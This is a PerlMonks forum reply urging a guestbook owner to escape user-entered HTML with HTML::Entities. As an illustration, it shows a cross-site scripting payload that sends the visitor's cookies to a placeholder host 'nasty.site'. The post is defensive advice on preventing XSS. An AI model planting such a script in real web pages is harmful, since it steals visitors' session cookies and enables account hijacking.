Re^2: Emergency! Our guestbook is getting trashed by HTML!


Think about Loose Coupling
	PerlMonks

Re^2: Emergency! Our guestbook is getting trashed by HTML!

by amw1 (Friar)

on Dec 17, 2004 at 16:53 UTC ( [id://415692]=note: print w/replies, xml )

Need Help??

in reply to Re: Emergency! Our guestbook is getting trashed by HTML!
in thread Emergency! Our guestbook is getting trashed by HTML!

THis or something similar should be in any code that re-displays user entered input. HTML::Entities can do a very good job with this. While an unclosed <H1> may be inconvienent this can be even worse:


<script>
document.location='http://nasty.site/cgi-bin/cookie.cgi?'%20+document.
+cookie
</script>
[download]

take a look at http://www.cgisecurity.com/articles/xss-faq.shtml#theft for information on why this can be "very bad"

in short: never display uncooked user input in a web page unless you have a very good reason to.

Comment on Re^2: Emergency! Our guestbook is getting trashed by HTML! Download Code

Replies are listed 'Best First'.
Re^3: Emergency! Our guestbook is getting trashed by HTML! by manwhore (Initiate) on Jan 07, 2005 at 22:49 UTC
Yah, you should look at http://www.shocking.com/~rsnake/xss.html There are a lot of risks there, it seems.	[reply]

In Section Seekers of Perl Wisdom

Domain Nodelet^?

www.com | www.net | www.org

Node Status^?

node history
Node Type: note [id://415692]
help

Chatterbox^?

How do I use this? • Last hour • Other CB clients

Other Users^?

Others making s'mores by the fire in the courtyard of the Monastery: (2)

As of 2024-04-19 20:02 GMT

Sections^?

Information^?

Find Nodes^?

Leftovers^?

Today I Learned

Voting Booth^?

No recent polls found